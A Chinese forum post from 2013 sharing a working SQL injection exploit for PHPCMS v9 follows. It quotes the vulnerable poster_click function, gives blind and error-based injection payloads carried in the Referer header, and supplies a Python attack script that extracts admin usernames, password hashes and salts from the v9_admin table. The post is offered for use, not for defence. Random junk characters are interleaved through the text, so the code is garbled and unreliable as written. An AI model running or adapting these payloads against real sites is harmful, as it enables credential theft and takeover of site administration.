有人放出了phpcmsv9的0day,就随时写了个利用代码,其中注入代码有两种形式:
, n. A7 T& ]/ E3 ]: A$ U
! k; U% o% l! T+ Q问题函数\phpcms\modules\poster\index.php
" d( U8 q- P" _$ a0 D; v6 {' k
: P( Y5 }. { O4 t# C7 Mpublic function poster_click() {
& Z% B* N$ H" j/ T8 A$id = isset($_GET['id']) ? intval($_GET['id']) : 0;: k* {3 w. f" i+ F: p: f
$r = $this->db->get_one(array('id'=>$id));
7 |9 i" P% d0 _/ x4 V* q. U0 Yif (!is_array($r) && empty($r)) return false;
# o6 J5 P" A; G9 _3 M) f! B: X$ip_area = pc_base::load_sys_class('ip_area');; h9 c4 a' j% Z! V' O. Z
$ip = ip();' y2 ]' ?8 d. t8 ]! u$ U; I
$area = $ip_area->get($ip);
, m1 n9 Z$ Q7 X+ w6 d+ o. p$username = param::get_cookie('username') ? param::get_cookie('username') : '';
: M% d. o4 A$ @0 a1 G* c) y( aif($id) {* L0 e$ _5 u# p& W. C
$siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();9 X# H4 `5 ^; D) [% O* d" z
$this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));; d' D) C7 |% |
}
. A5 Z) r8 o* `. }+ |" D v$this->db->update(array('clicks'=>'+=1'), array('id'=>$id));
# O; r9 u# N. e+ O$setting = string2array($r['setting']);
: }5 c( l8 M! ?9 a* B/ Zif (count($setting)==1) {0 W0 \- A6 Y( F/ c. Z: M2 n( O; E* _+ D
$url = $setting['1']['linkurl'];
$ T+ J+ L& C5 J2 B. r+ g1 m: x} else {
4 f3 W0 O, [: P) [$url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];
; `, i# C; F) H7 r2 j1 `) ^% G$ e) r}: m2 p- _& m/ h
header('Location: '.$url);
' W% [+ @0 e$ M$ p}
$ l: n( s, o9 W6 @; M: ?4 G% X: s7 @ d2 r
5 W# E- z2 s/ `) d
0 H* T; ~: o- F
利用方式:0 a. j: L5 y2 X" S1 }
7 P8 p( k" v) G' ^4 D% W1、可以采用盲注入的手法:
3 }7 D* Q$ `3 Z" Q+ |# K4 L8 ?4 X7 A# x2 [0 u4 |
referer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)#3 t/ L; h, D M f8 j! h% w
% z3 ^) T. h4 A通过返回页面,正常与否一个个猜解密码字段。
% h, a1 `$ ? E1 P( M
" V# @! ^# |, k3 w0 R2 J3 Q2、代码是花开写的,随手附上了:
( R7 o% y# Z" \+ u
4 R4 ?" H; K) K& e$ k8 W$ x) D1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#3 C" g0 s) A- F# o" v
, f/ H1 p5 A" k. A: `1 o此方法是爆错注入手法,原理自查。- B. ^3 {4 a# ]+ ]0 X
1 n( \4 H( z! m- N6 A. }* R9 d
8 G9 L0 v, U) R2 z
' c# v# |8 X, l$ Q. Y利用程序:8 R. q9 J& q7 m* O) p
7 c9 v+ ^( b4 w' v3 z8 z
#!/usr/bin/env python8 U$ b4 a5 t' W8 M% ]
import httplib,sys,re
7 D" R7 T% [) a4 D! W, p& \, c/ N2 l3 u4 G
def attack():
0 H4 X- j& A! ]print “Code by Pax.Mac Team conqu3r!”
1 o4 j7 r& {; A5 C {7 a9 J0 [! `; P( r# `print “Welcome to our zone!!!”2 E- e/ N! H/ W; i
url=sys.argv[1]) M2 p+ H X* E) R. V/ F9 ~5 `
paths=sys.argv[2]
6 d+ W8 O) r- Bconn = httplib.HTTPConnection(url)
; R C- h2 w7 N# \) Xi_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5″,0 x! Y, b5 L) }5 y) S9 A6 H
“Accept”: “text/plain”,
. o, ^ ]& u& Y; t U8 |, ?( a" [“Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”}
9 @' \+ d$ {$ ~7 mconn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers)
* j8 m5 d' V4 W, k% `- k qr1 = conn.getresponse()
% k R8 Q+ T1 ]2 T8 rdatas=r1.read()* ?# q; O9 t6 Z3 [2 V
datas=re.findall(r”Duplicate entry \’\w+’”, datas) K/ m; S/ I8 E( @$ D) [
print datas[0]+ A" C$ v: K V/ W
conn.close()
6 D6 U5 X" n. B# S2 G9 pif __name__==”__main__”:0 }# z! x7 q6 ^; d& x; \
if len(sys.argv)<3:; I! A: }; d+ K! P
print “Code by Pax.Mac Team conqu3r”( G' w% B Q# a, f% U* y: Z
print “Usgae:”) D' y- ^' m f& Z. M/ o
print “ phpcmsattack.py www.paxmac.org /”0 L) t* I. t% w5 r- b5 Q+ ^
print “ phpcmsataack.py www.paxmac.org /phpcmsv9/”
7 ^% Z5 `( V6 d: ]% C+ Csys.exit(1)
: ?) S! N2 s gattack()- X1 g1 O: z- T; N1 ?/ L
$ [ X3 f( m' k" _2 @- ]
|
发表于 2013-1-11 21:01:00
收藏
支持
反对